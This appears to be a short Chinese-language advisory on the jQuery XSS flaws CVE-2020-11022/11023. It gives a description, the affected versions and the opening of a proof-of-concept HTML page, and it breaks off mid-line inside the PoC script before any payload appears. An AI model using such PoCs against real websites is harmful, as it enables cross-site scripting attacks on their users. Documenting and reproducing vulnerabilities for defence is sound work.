警告
请勿使用本文提到的内容违反法律。
本文不提供任何担保
一、漏洞描述
由于执行了消毒(sanitize)处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),从而导致xss漏洞。
二、影响版本
大于或等于1.2且在3.5.0之前的jQuery版本中
三、漏洞复现
poc如下:
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title>
<script src="存在漏洞的jQuery网址"></script>
</head>
<body>
<script>
function test(n,jq){
sanitizedHTML = document.getElementById('poc'+n).inne